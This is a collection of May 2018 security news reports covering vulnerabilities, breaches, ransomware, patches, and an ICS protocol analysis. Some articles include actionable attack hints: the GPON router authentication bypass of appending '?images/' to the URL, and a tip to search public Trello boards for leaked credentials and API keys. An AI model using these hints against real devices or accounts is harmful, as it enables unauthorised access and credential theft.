In fact now, even trusting Trello, millions of users risk having their personal data exposed – including credential, private information, reserved information of their projects. In fact, they are now, while we are writing, having they sensitive data exposed on the Internet, thanks to a dork that can be easily used with Google.

The author of the discovery is Kushagra Pathak who talks about him as a Cyber-security enthusiast in his Twitter profile @xKushagra and has reported this incredible research written in his truly amazing blog post.

A few days ago, as he says, while researching a Bug Bounty program for Jiira with a simple dork like this:

trello 3

has, inputting “trello.com” in the [company_name] place, made an amazing discovery: Google query returns Trello Boards where are published every kind of information.

Giving a better look at the results he “found that a lot of individuals and companies are putting their sensitive information on their public Trello Boards.”. Yes, it’ amazing but happened: what kind of information they have put on the Trello Boards? “Information like unfixed bugs and security vulnerabilities, the credentials of their social media accounts, email accounts, server and admin dashboards”, all this has been indexed by all the search engines so they can easily find them. He twitted this
trello 3

Kushagra Pathak
@xKushagra
#bugbountytip #osint: Search for public Trello boards of companies, to find login credentials, API keys, etc. or if you aren't lucky enough, then you may find companies' Team Boards sometimes with tasks to fix security vulnerabilities

11:30 AM - Apr 25, 2018
178
83 people are talking about this
Twitter Ads info and privacy
So digging in the details he “went on to modify the search query to focus on Trello Boards containing the passwords for Gmail accounts.”

With this simple dork the result was really incredible:

Many passwords in clear were repowered by Google as shown in the following figure.

So Trello Boars have been under a huge misunderstanding: they were “Public” borders not Private ones, but their users didn’t know it, or they didn’t consider it.

Then some user used the public Trello Boards as “as a fancy public password manager for their organization’s credentials.”, as Kushagra Pathak writes.

Then every kind of the search is then possible: by email (AoL, Yahoo, Mail.com) by protocol (SSH, FTP), everything is possible to search even business emails, social media accounts, website analytics, Stripe, AdWords accounts.

At this point, I have contributed to spread the info around the world.

Odisseus
@_odisseus
#Trello is an online tool for managing projects and personal tasks and with a dork is possible to exfiltrate business emails, Jira credentials, and sensitive internal information of Bug Bounty Programs.
Via @xKushagra https://medium.freecodecamp.org/discovering-the-hidden-mine-of-credentials-and-sensitive-information-8e5ccfef2724 …

9:18 AM - May 11, 2018
132
109 people are talking about this
Twitter Ads info and privacy
Kushagra Pathak has also discovered almost than 25 Companies were leaking very sensitive information and, as a proven Ethical Hacker, he reported quickly the Trello vulnerability to them, facing a very tedious and challenging task.

The only ironic side of this story is that to find the right person or the right contact mail it has been easy: they were all on the Trello Boards.

There is a less ironic thing: what about the Bug Bounty? Our hero, who discovered this vulnerable, has found among the exposed companies one company running a Bug Bounty Program, but he hasn’t be rewarded at all: “Unfortunately, they didn’t reward me because it was an issue for which they currently don’t pay”, he said.


Self-destructing messages received on 'Signal for Mac' can be recovered later
11.5.2018 thehackernews Apple

It turns out that macOS client for the popular end-to-end encrypted messaging app Signal fails to properly delete disappearing (self-destructing) messages from the recipient's system, leaving the content of your sensitive messages at risk of getting exposed.
For those unaware, the disappearing messages in Signal self-destruct after a particular duration set by the sender, leaving no trace of it on the receiver's device or Signal servers.
However, security researcher Alec Muffett noticed that the messages that are supposed to be "disappearing" can still be seen—even if they are deleted from the app.
Another security researcher Patrick Wardle reproduced the issue and explained that macOS makes a copy (partial for long messages) of disappearing messages in a user-readable database of macOS's Notification Center, from where they can be recovered anytime later.
If you want to keep an on your incoming messages without having to check your inbox obsessively, macOS desktop notifications (banners and alerts) that appear in the upper-right corner of your screen is a great way to alert you of things you don't want to miss.

According to a blog post published by Wardle, if you have enabled notifications for Signal app, the service will show you notifications for the disappearing messages as well in the form of truncated messages (which is generally 1-1.5 lines of the full message).
Now, sharing incoming disappearing messages with the notification system leads to two privacy issues:
"Disappearing" messages may remain in the User Interface of macOS Notification Center even after being deleted within the Signal app and can be seen in the notification bar until manually closed by the user.
In the backend, the SQLite database of Notification Center also keeps a copy of truncated messages, which can be accessed with normal user permissions, or by a malicious app installed on the system.
Wardle suggests either Signal should not provide notifications service for disappearing messages or should explicitly delete such notifications from the system’s database when it removes the messages from the app UI.
Meanwhile, to protect the content of your sensitive messages so that no malicious app, hacker or your wife can recover them, you should consider disabling notifications service until Signal patches this issue.


Microsoft Issues Emergency Patch For Critical Flaw In Windows Containers
11.5.2018 thehackernews
Vulnerebility

Just a few days prior to its monthly patch release, Microsoft released an emergency patch for a critical vulnerability in the Windows Host Compute Service Shim (hcsshim) library that could allow remote attackers to run malicious code on Windows computers.
Windows Host Compute Service Shim (hcsshim) is an open source library that helps "Docker for Windows" execute Windows Server containers using a low-level container management API in Hyper-V.
Discovered by Swiss developer and security researcher Michael Hanselmann, the critical vulnerability (tracked as CVE-2018-8115) is the result of the failure of the hcsshim library to properly validate input when importing a Docker container image.
This, in turn, allows an attacker to remotely execute arbitrary code on the Windows host operating system, eventually letting the attacker create, remove, and replace files on the target host.
As Hanselmann explained in his personal blog, "Importing a Docker container image or pulling one from a remote registry isn't commonly expected to make modifications to the host file system outside of the Docker-internal data structures."
Hanselmann reported the issue to Microsoft in February this year, and the tech giant fixed the vulnerability a few days before this month’s patch Tuesday by releasing an updated version of hcsshim.
Although the vulnerability has been assigned a critical severity rating, Microsoft says exploitation of this issue is unlikely.
"To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host," Microsoft says in its advisory.
The patch for this vulnerability addresses the way hcsshim validates input from Docker container images, therefore blocking the loading of malicious code in specially crafted files.
An updated version 0.6.10 of the Windows Host Compute Service Shim (hcsshim) file is available right now for download from GitHub.
Full details of the vulnerability have not been released yet, but Hanselmann promises to publish in-depth technical details and a proof-of-concept exploit for the flaw on May 9, following an agreement with Microsoft security response center.
Microsoft's May 2018 Patch Tuesday has been scheduled for release on May 8.


Change Your Twitter Password Immediately, Bug Exposes Passwords in Plaintext
11.5.2018 thehackernews
Social

Twitter is urging all of its 330 million users to change their passwords after a software glitch unintentionally exposed its users' passwords by storing them in readable text on its internal computer system.
The social media network disclosed the issue in an official blog post and a series of tweets from Twitter Support.


According to Twitter CTO Parag Agrawal, Twitter hashes passwords using a popular function known as bcrypt, which replaces an actual password with a random set of numbers and letters and then stored it in its systems.
This allows the company to validate users' credentials without revealing their actual passwords, while also masking them in a way that not even Twitter employees can see them.

However, a software bug resulted in passwords being written to an internal log before completing the hashing process—meaning that the passwords were left exposed on the company's internal system.
Parag said Twitter had found and resolved the problem itself, and an internal investigation had found no indication of breach or passwords being stolen or misused by insiders.
"We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again," Parag said.


"We are very sorry this happened. We recognize and appreciate the trust you place in us, and are committed to earning that trust every day."
Still, the company urged all of its 363 Million users to consider changing their passwords to be on a safer side.
How to Reset Twitter Password
In order to change your password on Twitter, click on your Profile Picture icon given in the top-right corner, then go to Settings and Privacy → Password. Now, type your current password, and enter a new one, and try keeping it stronger.
For the Twitter app for iOS and Android, click on your Profile Picture icon in the top-left corner, and then go to Settings and Privacy → Account → Change Password ("Password" on Android), and create a new, stronger password.
You should also change the password on all other services where you have used the same password.
You are also advised to enable two-factor authentication service on Twitter, which adds an extra layer of security to your account and help prevent your account from being hijacked.


8 New Spectre-Class Vulnerabilities (Spectre-NG) Found in Intel CPUs
11.5.2018 thehackernews
Vulnerebility

A team of security researchers has reportedly discovered a total of eight new "Spectre-class" vulnerabilities in Intel CPUs, which also affect at least a small number of ARM processors and may impact AMD processor architecture as well.
Dubbed Spectre-Next Generation, or Spectre-NG, the partial details of the vulnerabilities were first leaked to journalists at German computer magazine Heise, which claims that Intel has classified four of the new vulnerabilities as "high risk" and remaining four as "medium."
The new CPU flaws reportedly originate from the same design issue that caused the original Spectre flaw, but the report claims one of the newly discovered flaws allows attackers with access to a virtual machine (VM) to easily target the host system, making it potentially more threatening than the original Spectre vulnerability.
"Alternatively, it could attack the VMs of other customers running on the same server. Passwords and secret keys for secure data transmission are highly sought-after targets on cloud systems and are acutely endangered by this gap," the report reads.
"However, the aforementioned Spectre-NG vulnerability can be exploited quite easily for attacks across system boundaries, elevating the threat potential to a new level. Cloud service providers such as Amazon or Cloudflare and, of course, their customers are particularly affected."
If you're unaware, Spectre vulnerability, which was reported earlier this year, relies upon a side-channel attack on a processors' speculative execution engine, allowing a malicious program to read sensitive information, like passwords, encryption keys, or sensitive information, including that of the kernel.
Although the German site did not disclose the name of the security researchers (or the team/company) who reported these flaws to Intel, it revealed one of the weaknesses was discovered by a security researcher at Google's Project Zero.
The site also claimed that the Google security researcher reported the flaw to the chip manufacturers almost 88 days ago—which indicates the researcher would possibly reveal the details of at least one flaw on May 7th, when the 90-day disclosure window will be closed, which is the day before the Windows Patch Tuesday.
Responsibly disclosing Spectre NG vulnerabilities to vendors is definitely a good practice, but it seems the researchers, who discovered the new series of Spectre-class flaws, are avoiding their names to come out early—maybe to prevent media criticism similar to the one faced by CTS Labs after they disclosed partial details of AMD flaws with dedicated website, beautiful graphics, and videos.
Intel's Response to Spectre-NG Flaws
Nevermind. When asked Intel about the new findings, the chip maker giant provides the following statement, which neither confirms nor denies the existence of the Spectre-NG vulnerabilities:
"Protecting our customers' data and ensuring the security of our products are critical priorities for us. We routinely work closely with customers, partners, other chip makers and researchers to understand and mitigate any issues that are identified, and part of this process involves reserving blocks of CVE numbers."
"We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations. As a best practice, we continue to encourage everyone to keep their systems up-to-date."
Meanwhile, when asked Heise about the Common Vulnerabilities and Exposures (CVE) numbers reserved for the new Spectre-NG vulnerabilities, the journalist refused to share any details and commented:
"The CVEs are currently only naked numbers without added value. On the other hand, their publication might have meant a further risk to our sources that we wanted to avoid. That's why we decided against it at the moment. We will submit the course, of course."
Brace For New Security Patches
The Spectre-NG vulnerabilities reportedly affect Intel CPUs, and there are also indications that at least some ARM processors are vulnerable to the issues, but the impact on AMD processors has yet to be confirmed.
According to the German site, Intel has already acknowledged the new Spectre-NG vulnerabilities and are planning to release security patches in who shifts—one in May and second is currently scheduled for August.
Microsoft also plans to fix the issues by releasing a security patch with Windows updates in the upcoming months.
However, it’s currently unknown if applying new patches would once again impact the performance of vulnerable devices, just like what happened with the original Spectre and Meltdown vulnerabilities earlier this year.


Android P to Block Apps From Monitoring Device Network Activity
11.5.2018 thehackernews Android

Do you know that any app you have installed on your Android phone can monitor the network activities—even without asking for any sensitive permission—to detect when other apps on your phone are connecting to the Internet?
Obviously, they cant see the content of the network traffic, but can easily find to which server you are connecting to, all without your knowledge. Knowing what apps you often use, which could be a competing or a financial app, "shady" or "malicious" app can abuse this information in various ways to breach your privacy.
But it seems like Google has planned to address this serious privacy issue with the release of its next flagship mobile operating system.
With Android P, any app will no longer be able to detect when other apps on your Android device are connecting to the Internet, according to the new code changes in Android Open Source Project (AOSP) first noticed by XDA Developers.
"A new commit has appeared in the Android Open Source Project to 'start the process of locking down proc/net,' [which] contains a bunch of output from the kernel related to network activity," XDA Developers writes.
"There's currently no restriction on apps accessing /proc/net, which means they can read from here (especially the TCP and UDP files) to parse your device's network activity. You can install a terminal app on your phone and enter cat /proc/net/udp to see for yourself."
Also Read: Android P Will Block Background Apps from Accessing Your Camera, Microphone
However, the new changes applied to the SELinux rules of Android P will restrict apps from accessing some network information.

The SELinux changes will enable only designated VPN apps to access some of the network information, while other Android apps seeking access to this information will be audited by the operating system.
However, it should be noted that the new SELinux changes are coming for apps using API level 28 running on Android P—which means that apps working with API levels prior to 28 continue to have access to the device' network activities until 2019.
A few custom ROMs for Android, such as CopperheadOS, have already implemented these changes years ago, offering better privacy to their users.
As XDA developers pointed out, this new change introduced to the Android operating system appears to be very small that users will hardly notice, "but the implications for user privacy will be massive."


First-Ever Ransomware Found Using ‘Process Doppelgänging’ Attack to Evade Detection
11.5.2018 thehackernews
Ransomware

Security researchers have spotted the first-ever ransomware exploiting Process Doppelgänging, a new fileless code injection technique that could help malware evade detection.
The Process Doppelgänging attack takes advantage of a built-in Windows function, i.e., NTFS Transactions, and an outdated implementation of Windows process loader, and works on all modern versions of Microsoft Windows OS, including Windows 10.
Process Doppelgänging attack works by using NTFS transactions to launch a malicious process by replacing the memory of a legitimate process, tricking process monitoring tools and antivirus into believing that the legitimate process is running.
If you want to know more about how Process Doppelgänging attack works in detail, you should read this article I published late last year.
Shortly after the Process Doppelgänging attack details went public, several threat actors were found abusing it in an attempt to bypass modern security solutions.
Security researchers at Kaspersky Lab have now found the first ransomware, a new variant of SynAck, employing this technique to evade its malicious actions and targeting users in the United States, Kuwait, Germany, and Iran.

Initially discovered in September 2017, the SynAck ransomware uses complex obfuscation techniques to prevent reverse engineering, but researchers managed to unpack it and shared their analysis in a blog post.
An interesting thing about SynAck is that this ransomware does not infect people from specific countries, including Russia, Belarus, Ukraine, Georgia, Tajikistan, Kazakhstan, and Uzbekistan.
To identify the country of a specific user, the SynAck ransomware matches keyboard layouts installed on the user's PC against a hardcoded list stored in the malware. If a match is found, the ransomware sleeps for 30 seconds and then calls ExitProcess to prevent encryption of files.
SynAck ransomware also prevents automatic sandbox analysis by checking the directory from where it executes. If it found an attempt to launch the malicious executable from an 'incorrect' directory, SynAck won't proceed further and will instead terminate itself.
Once infected, just like any other ransomware, SynAck encrypts the content of each infected file with the AES-256-ECB algorithm and provides victims a decryption key until they contact the attackers and fulfill their demands.

SynAck is also capable of displaying a ransomware note to the Windows login screen by modifying the LegalNoticeCaption and LegalNoticeText keys in the registry. The ransomware even clears the event logs stored by the system to avoid forensic analysis of an infected machine.
Although the researchers did not say how SynAck lands on the PC, most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs.
Therefore, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source in an attempt to safeguard against such ransomware infection.
Although, in this case, only a few security and antivirus software can defend or alert you against the threat, it is always a good practice to have an effective antivirus security suite on your system and keep it up-to-date.
Last but not the least: to have a tight grip on your valuable data, always have a backup routine in place that makes copies of all your important files to an external storage device that isn't always connected to your PC.


Twitter is Testing End-to-End Encrypted Direct Messages
11.5.2018 thehackernews
Social

Twitter has been adopting new trends at a snail's pace. But it’s better to be late than never.
Since 2013 people were speculating that Twitter will bring end-to-end encryption to its direct messages, and finally almost 5 years after the encryption era began, the company is now testing an end-to-end encrypted messaging on Twitter.
Dubbed "Secret Conversation," the feature has been spotted in the latest version of Android application package (APK) for Twitter by Jane Manchun Wong, a computer science student at the University of Massachusetts Dartmouth.
End-to-end encryption allows users to send and receive messages in a way that no one, be it an FBI agent with a warrant, hacker or even the service itself, can intercept them.
However, it seems like the Secret Conversation feature has currently been available only to a small number of users for testing. So, if you are one of those lucky ones, you will be able to send end-to-end encrypted Secret Conversation through Direct Messages.
Secret Conversation appears to allow Twitter users to send encrypted direct messages and beef up the security of their conversation.
How to Send Encrypted Twitter Direct Messages

Unlike WhatsApp and Apple's iMessage, your all conversations on Twitter DM will not be end-to-end encrypted by default; rather you'll have to selectively start an encrypted chat, just like you start a Secret Conversations on Facebook Messenger.
As shown in the screenshot shared by Wong, one needs to follow below-mentioned steps to start a Secret Conversation on Twitter (after it's available to everyone):
Open the Twitter app on your Android device.
Open an existing conversation or start a new DM conversation with the person you want to chat secretly.
Tap the information icon in the upper right corner of your phone.
Select 'Start a secret text message,' and a new window will open where you can send encrypted messages.
It should be noted that the current infrastructure of Twitter does not offer the privacy of individuals' encryption keys require to encrypt/decrypt messages, thus Secret Conversation feature would not be available for desktop/web version of Twitter.
Instead, only mobile apps (Android/iOS) for Twitter can easily be used to keep your encryption keys secret on your smartphones, just like WhatsApp, and Facebook Messenger.
Besides Secret Conversation, Twitter is also working on an in-app "Data Saver" mode, which if enabled, saves some of your bandwidth and speeds up the app by disabling autoplay for videos and loading of heavy images.


Two Romanian Hackers Extradited to the U.S. Over $18 Million Vishing Scam
11.5.2018 thehackernews Crime

Two Romanian hackers have been extradited to the United States to face 31 criminal charges including computer fraud and abuse, wire fraud conspiracy, wire fraud, and aggravated identity theft.
Described as "international computer hackers" by the United States Department of Justice, Teodor Laurentiu Costea, 41, and Robert Codrut Dumitrescu, 40, allegedly rob Americans of more than $18 million in an elaborate phishing scheme.
Costea and Dumitrescu were named in the 31-count federal grand jury indictment on August 16 last year and were accused last week in the Northern District of Georgia following their extradition.
Another co-defendant, Cosmin Draghici, 28, remains in custody in Romania awaiting his extradition to the United States.
"These extraditions send a strong warning to cybercriminals and fraudsters worldwide, that we, along with our law-enforcement partners, will work tirelessly to bring you to justice," said U. S. Attorney Byung J. "BJay" Pak.
According to the indictment, between October 2011 and February 2014, Costea and Dumitrescu installed interactive voice response software on vulnerable PCs located in the U.S. to initiate thousands of automated phone calls and text messages.
Those messages and phone calls purported to be from a financial institution and directed victims to call a number due to an issue with their respective financial accounts.
When victims called that number, they were prompted by the IVR software to hand over their bank account numbers, PINs, and full or partial Social Security Numbers (SSNs), which were then allegedly sold or used by Costea and Dumitrescu with the assistance of Draghici.
The U.S. Department of Justice described this elaborated voice- and SMS-phishing tactics as "vishing" and "smishing" respectively.


At the time of Costea's arrest, he alone possessed 36,051 financial account numbers fraudulently obtained by innocent people, the court documents alleged.
U.S. officials estimate the losses from the vishing and smishing scheme amount to more than $18 million.
The United States government has recently extradited several cyber criminals in connection with different cyber crimes. Earlier this year, Spain deported Russian hacker Peter Yuryevich Levashov to America for his alleged role in a massive Kelihos botnet.
In March, Russian hacker Yevgeniy Aleksandrovich Nikulin was extradited to the United States from the Czech Republic for his ties to data breaches at LinkedIn, Dropbox, and now-defunct social-networking firm Formspring.
FBI Special Agent in Charge David LeValley hopes the extraditions will serve as a message to cybercriminals across the world, saying "Our message to the victims of cyber fraud is that the FBI won’t let geographic boundaries stop us from pursuing and prosecuting the persons who cause them tremendous financial pain."


A Simple Tool Released to Protect Dasan GPON Routers from Remote Hacking
11.5.2018 thehackernews Hacking

Since hackers have started exploiting two recently disclosed unpatched critical vulnerabilities found in GPON home routers, security researchers have now released an unofficial patch to help millions of affected users left vulnerable by their device manufacturer.
Last week, researchers at vpnMentor disclosed details of—an authentication bypass (CVE-2018-10561) and a root-remote code execution vulnerability (CVE-2018-10562)—in many models of Gigabit-capable Passive Optical Network (GPON) routers manufacturer by South Korea-based DASAN Zhone Solutions.
If exploited, the first vulnerability lets an attacker easily bypass the login authentication page just by appending ?images/ to the URL in the browser's address bar.
However, when coupled with the second flaw that allows command injection, unauthenticated attackers can remotely execute malicious commands on the affected device and modified DNS settings, eventually allowing them to take full control of the device remotely.
Shortly after the details of the vulnerabilities went public, security researchers at Chinese IT security firm Qihoo 360 Netlab found that threat actors have started exploiting both the flaws to add the vulnerable routers into their botnet malware networks.

 

Moreover, a working proof-of-concept (PoC) exploit, written in python, for GPON router vulnerabilities has already been released on GitHub by an independent security researcher, eventually making exploitation easier for even unskilled hackers.
The researchers even published a video demonstration showing how the attack works.
Here's How to Secure Your GPON Wi-Fi Router

Researchers at vpnMentor already reported the issues to Dasan, but the company has not yet released any fix for the issue, and the researchers believe that the patch is not in development either.
What's worse? At the time of writing, almost a million vulnerable GPON routers are still exposed on the Internet and can be easily hijacked.
However, even if there is no official patch available, users can protect their devices by disabling remote administration and using a firewall to prevent outside access from the public Internet.
Making these changes to your vulnerable router would restrict access to the local network only, within the range of your Wi-Fi network, effectively reducing the attack surface by eliminating remote attackers.
If you are unsure about these settings, vpnMentor has done this job for you by providing an online "user-friendly" solution that automatically modifies your router settings on your behalf, keeping you away from remote attacks.
"It was created to help mitigate the vulnerabilities until an official patch is released," the researchers said. "This tool disables the web server in a way that is not easy to reverse, it can be done with another patch script, but if you are not comfortable with the command line we suggest firewalling your device until an official patch is released."
To use this tool, all you need open this web page, and scroll down to the input form asking for the IP address of your exposed GPON router (local LAN address, not WAN), a new password for SSH/Telnet on your router.
In a separate tab open your router's web interface using https in the URL and then press "Run Patch" on the vpnMentor to continue and apply changes.
You can apply the patch to secure your devices, but it should be noted that it is not an official patch from the manufacturer and we do not encourage users to run any third-party scripts or patches on their devices.
So, users should either wait for official fixes or apply changes manually, when possible.


Hackers Found Using A New Way to Bypass Microsoft Office 365 Safe Links
11.5.2018 thehackernews Hacking
Security researchers revealed a way around that some hacking groups have been found using in the wild to bypass a security feature of Microsoft Office 365, which is originally designed to protect users from malware and phishing attacks.
Dubbed Safe Links, the feature has been included in Office 365 software as part of Microsoft's Advanced Threat Protection (ATP) solution that works by replacing all URLs in an incoming email with Microsoft-owned secure URLs.
So, every time a user clicks on a link provided in an email, it first sends the user to a Microsoft owned domain, where the company immediately checks the original URL for anything suspicious. If Microsoft's scanners detect any malicious element, it then warns users about it, and if not, it redirects the user to the original link.


However, researchers at cloud security company Avanan have revealed how attackers have been bypassing the Safe Links feature by using a technique called, "baseStriker attack."
BaseStriker attack involves using the <base> tag in the header of an HTML email—which is used to defines a default base URI, or URL, for relative links in a document or web page.
In other words, if the <base> URL is defined, then all subsequent relative links will use that URL as a starting point.

As shown in the above screenshot, the researchers compared HTML code of a traditional phishing email with the one that uses a <base> tag to split up the malicious link in a way that Safe Links fails to identify and replace the partial hyperlink, eventually redirecting victims to the phishing site, when clicked.
Researchers have even provided a video demonstration, which shows the baseStriker attack in action.
The researchers tested the baseStriker attack against several configurations and found that "anyone using Office 365 in any configuration is vulnerable," be it web-based client, mobile app or desktop application of OutLook.

 

Proofpoint is also found vulnerable to the baseStriker attack. However, Gmail users and those protecting their Office 365 with Mimecast are not impacted by this issue.
So far, researchers have only seen hackers using the baseStriker attack to send phishing emails, but they believe the attack can be leveraged to distribute ransomware, malware and other malicious software.

Avanan reported the issue to both Microsoft and Proofpoint earlier last weekend, but there is no patch available to fix the problem at the time of writing.


Microsoft Patches Two Zero-Day Flaws Under Active Attack
11.5.2018 thehackernews 
Attack  Vulnerebility 

It's time to gear up for the latest May 2018 Patch Tuesday.
Microsoft has today released security patches for a total of 67 vulnerabilities, including two zero-days that have actively been exploited in the wild by cybercriminals, and two publicly disclosed bugs.
In brief, Microsoft is addressing 21 vulnerabilities that are rated as critical, 42 rated important, and 4 rated as low severity.
These patch updates address security flaws in Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Microsoft Office Exchange Server, Outlook, .NET Framework, Microsoft Hyper-V, ChakraCore, Azure IoT SDK, and more.
1) Double Kill IE 0-day Vulnerability
The first zero-day vulnerability (CVE-2018-8174) under active attack is a critical remote code execution vulnerability that was revealed by Chinese security firm Qihoo 360 last month and affected all supported versions of Windows operating systems.
Dubbed "Double Kill" by the researchers, the vulnerability is notable and requires prompt attention as it could allow an attacker to remotely take control over an affected system by executing malicious code remotely through several ways, such as a compromised website, or malicious Office documents.
The Double Kill vulnerability is a use-after-free issue which resides in the way the VBScript Engine (included in all currently supported versions of Windows) handles objects in computer memory, allowing attackers to execute code that runs with the same system privileges as of the logged-in user.
"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked 'safe for initialization' in an application or Microsoft Office document that hosts the IE rendering engine," Microsoft explains in its advisory.
"The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability."
Users with administrative rights on their systems are impacted more than the ones with limited rights, as an attacker successfully exploiting the vulnerability could take control of an affected system.

However, that doesn't mean that low-privileged users are spared. If users are logged in on an affected system with more limited rights, attackers may still be able to escalate their privileges by exploiting a separate vulnerability.
Researchers from Qihoo 360 and Kaspersky Labs found that the vulnerability was actively being exploited in the wild by an advanced state-sponsored hacking group in targeted attacks, but neither Microsoft nor Qihoo 360 and Kaspersky provided any information on the threat group.
2) Win32k Elevation of Privilege Vulnerability
The second zero-day vulnerability (CVE-2018-8120) patched this month is a privilege-escalation flaw that occurred in the Win32k component of Windows when it fails to properly handle objects in computer memory.
Successful exploitation of the flaw can allow attackers to execute arbitrary code in kernel mode, eventually allowing them to install programs or malware; view, edit or delete data; or create new accounts with full user rights.
The vulnerability is rated "important," and only affects Windows 7, Windows Server 2008 and Windows Server 2008 R2. The issue has actively been exploited by threat actors, but Microsoft did not provide any detail about the in-the-wild exploits.
Two Publicly Disclosed Flaws
Microsoft also addressed two "important" Windows vulnerabilities whose details have already been made public.
One of these is a Windows kernel flaw (CVE-2018-8141) that could lead to information disclosure, and the other is a Windows Image bug (CVE-2018-8170) that could lead to Elevation of Privilege.
In addition, the May 2018 updates resolve 20 more critical issues, including memory corruptions in the Edge and Internet Explorer (IE) scripting engines and remote code execution (RCE) vulnerabilities in Hyper-V and Hyper-V SMB.
Meanwhile, Adobe has also released its Patch Tuesday updates, addressing five security vulnerabilities—one critical bug in Flash Player, one critical and two important flaws in Creative Cloud and one important bug in Connect.
Users are strongly advised to install security updates as soon as possible in order to protect themselves against the active attacks in the wild.
For installing security updates, head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


Microsoft Adds Support for JavaScript in Excel—What Could Possibly Go Wrong?
11.5.2018 thehackernews Security

Shortly after Microsoft announced support for custom JavaScript functions in Excel, someone demonstrated what could possibly go wrong if this feature is abused for malicious purposes.
As promised last year at Microsoft's Ignite 2017 conference, the company has now brought custom JavaScript functions to Excel to extend its capabilities for better work with data.
Functions are written in JavaScript for Excel spreadsheets currently runs on various platforms, including Windows, macOS, and Excel Online, allowing developers to create their own powerful formulae.
But we saw it coming:

Security researcher Charles Dardaman leveraged this feature to show how easy it is to embed the infamous in-browser cryptocurrency mining script from CoinHive inside an MS Excel spreadsheet and run it in the background when opened.
"In order to run Coinhive in Excel, I followed Microsoft’s official documentation and just added my own function," Dardaman said.
Here is an official documentation from Microsoft to learn how to run custom JavaScript functions in Excel.
But... JavaScript for Excel Poses Less Threat—Here's Why?

However, it should be noted that Excel add-ins, the APIs which are responsible for running the JavaScript custom functions, don’t execute by default immediately after opening the JS-embedded spreadsheet.
Instead, users need to manually load and run JavaScript functions through the Excel add-ins feature for the first time, and later it will get executed automatically every time the Excel file is opened on the same system.
Moreover, when you explicitly try to run a JavaScript function in Excel sheet that connects to an external server, Microsoft prompts the user to allow or deny the connection, preventing unauthorized code from executing.
Therefore, JavaScript for Excel does not pose much threat today, unless and until someone finds a way around to execute it automatically without requiring any user interaction.
Besides this, Microsoft has also confirmed that Excel add-ins currently rely on a hidden browser process to run asynchronous custom functions, but in the future, it will run JavaScript directly on some platforms to save memory.
For now, JavaScript custom functions for Excel has been made available in Developer Preview edition for Windows, Mac, iPads and Excel Online only to Office 365 subscribers enrolled in the MS Office Insiders program.
Microsoft will soon roll this feature out to a broader audience.


OPC UA security analysis
11.5.2018 Kaspersky Analysis  ICS

This paper discusses our project that involved searching for vulnerabilities in implementations of the OPC UA protocol. In publishing this material, we hope to draw the attention of vendors that develop software for industrial automation systems and the industrial internet of things to problems associated with using such widely available technologies, which turned out to be quite common. We hope that this article will help software vendors achieve a higher level of protection from modern cyberattacks. We also discuss some of our techniques and findings that may help software vendors control the quality of their products and could prove useful for other software security researchers.

Why we chose the OPC UA protocol for our research
The IEC 62541 OPC UA (Object Linking and Embedding for Process Control Unified Automation) standard was developed in 2006 by the OPC Foundation consortium for reliable and, which is important, secure transfer of data between various systems on an industrial network. The standard is an improved version of its predecessor – the OPC protocol, which is ubiquitous in modern industrial environments.

It is common for monitoring and control systems based on different vendors’ products to use mutually incompatible, often proprietary network communication protocols. OPC gateways/servers serve as interfaces between different industrial control systems and telemetry, monitoring and telecontrol systems, unifying control processes at industrial enterprises.

The previous version of the protocol was based on the Microsoft DCOM technology and had some significant limitations inherent to that technology. To get away from the limitations of the DCOM technology and address some other issues identified while using OPC, the OPC Foundation developed and released a new version of the protocol.

Thanks to its new properties and well-designed architecture, the OPC UA protocol is rapidly gaining popularity among automation system vendors. OPC UA gateways are installed by a growing number of industrial enterprises across the globe. The protocol is increasingly used to set up communication between components of industrial internet of things and smart city systems.

The security of technologies that are used by many automation system developers and have the potential to become ubiquitous among industrial facilities across the globe is one the highest-priority areas of research for Kaspersky Lab ICS CERT. This was our main reason to do an analysis of OPC UA.

Another reason was that Kaspersky Lab is a member of the OPC Foundation consortium and we feel responsible for the security of technologies developed by the consortium. Getting ahead of the story, we can say that, following the results of our research, we received an invitation to join the OPC Foundation Security Working Group and gratefully accepted it.

OPC UA protocol
Originally, OPC UA was designed to support data transport for two data types: the traditional binary format (used in previous versions of the standard) and SOAP/XML. Today, data transfer in the SOAP/XML format is considered obsolete in the IT world and is almost never used in modern products and services. The prospects of it being widely used in industrial automation systems are obscure, so we decided to focus our research on the binary format.

If packets exchanged by services running on the host are intercepted, their structure can easily be understood. There are four types of messages transmitted over the OPC UA protocol:

HELLO
OPEN
MESSAGE
CLOSE
The first message is always HELLO (HEL). It serves as a marker for the start of data transfer between the client and the server. The server responds by sending the ACKNOWLEDGE (ACK) message to the client. After the initial exchange of messages, the client usually sends the message OPEN, which means that the data transmission channel using the encryption method proposed by the client is now open. The server responds by sending the message OPEN (OPN), which includes the unique ID of the data channel and shows that the server agrees to the proposed encryption method (or no encryption).

Now the client and the server can start exchanging messages –MESSAGE (MSG). Each message includes the data channel ID, the request or response type, a timestamp, data arrays being sent, etc. At the end of the session, the message CLOSE (CLO) is sent, after which the connection is terminated.

Source: https://readthedocs.web.cern.ch/download/attachments/21178021/OPC-UA-Secure-Channel.JPG?version=1&modificationDate=1286181543000&api=v2

OPC UA is a standard that has numerous implementations. In our research, we only looked at the specific implementation of the protocol developed by the OPC Foundation.

The initial stage
We first became interested in analyzing the OPC UA protocol when the Kaspersky Lab ICS CERT team was conducting security audits and penetration tests at several industrial enterprises. All of these enterprises used the same industrial control system (ICS) software. With the approval of the customers, we analyzed the software for vulnerabilities as part of the testing.

It turned out that part of the network services in the system we analyzed communicated over the OPC UA protocol and most executable files used a library named “uastack.dll”.

The first thing we decided to do as part of analyzing the security of the protocol’s implementation was to develop a basic “dumb” mutation-based fuzzer.

